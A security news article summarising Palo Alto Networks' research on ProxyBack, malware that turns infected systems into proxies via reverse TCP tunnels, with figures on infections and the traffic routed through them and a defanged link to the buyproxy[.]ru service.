Security researchers at Palo Alto Networks have discovered a new family of malware that secretly turns infected systems into Internet proxies.
Dubbed ProxyBack, the family includes over 20 malware versions and has been observed infecting systems since March 2014, Palo Alto Networks’ Jeff White explains in a blog post. According to the researchers, ProxyBack’s distribution in focused mainly in Europe, and its primary targets appear to be educational institutions.
Proxies are often used to protect one’s privacy on the Internet, but the malware creates a dangerous situation for users by turning their systems into proxies and abusing them as a proxy service. Moreover, the masterminds behind it managed to configure compromised machines in a manner that allows network traffic to flow through the proxies unhindered.
To ensure that the proxy is not blocked by firewalls or other network based restrictions, ProxyBack builds a reverse tunnel over TCP to an attacker controlled proxy server. Through having the infected system make the initial call home, the proxy server can send its traffic through the tunnel and to the Internet or to other devices on the network unrestricted.
This approach means that the victim proxy creates a hole in the firewall by establishing a TCP connection with the attacker controlled proxy server, while the server validates its access to the victim proxy and the ability to successfully route traffic through it. As soon as that happens, the victim proxy is unwillingly participating in the routing of web traffic to the Internet, the network security firm said.
The first step ProxyBack takes when establishing the tunnel is to make a connection to a web server hosting a PHP file that contains a URL to another PHP file on the same server. The second PHP file is used to send commands to the initial web server and grab information to set up the proxy connection.
The server is provided with information that includes the public IP address of the victim proxy and the ID for the victim proxy. The ID is used to keep track of the infected system, and Palo Alto Networks determined that over 11,000 machines could have been compromised to date.
ProxyBack also reports the version of the running malware and the running operating system, and the security researchers suggest that it might be running on Windows 2000 and older platform iterations, including Windows Home Server and Windows Server 2003 to Windows Server 2016, since it can report any of these versions to the proxy server.
Palo Alto Networks reports a sizable increase in traffic routed through infected systems and notes that ProxyBack is used as a proxy service, but that users’ traffic is neither anonymous nor safe from tampering. Most of the traffic is said to source from an automated system creating fake accounts across dating sites like “farmersonly.com”, “match.com”, “meetme.com”, and “okcupid.com”.
Another website was “buyproxy.ru,” which matched a proxy service found within the security firm’s captures, with a GET Request Method to http://buyproxy[.]ru/proxy/ observed at less than 4 hours into the capture. However, there was also legitimate traffic coming from benign users, and it included sites like eBay, Twitter, Craigslist, Facebook, Wikipedia, and more.
The buyproxy[.]ru website claims to have been in business for over 7 years and to offer private proxy servers that are not in public proxy bases, while also saying that connections are encrypted and use a “proprietary technology of traffic tunneling.” Security researchers found various victim proxies listed on the website, suggesting that, if people behind “buyproxy[.]ru” are not responsible for the distribution of the ProxyBack malware, the malware is certainly designed for and used in their service.
